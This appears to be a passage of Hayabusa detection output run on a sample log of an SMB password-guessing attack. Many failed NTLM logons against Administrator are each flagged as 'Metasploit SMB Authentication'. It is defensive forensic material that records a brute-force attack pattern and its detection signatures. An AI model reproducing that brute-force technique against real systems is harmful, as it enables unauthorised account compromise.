SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: 
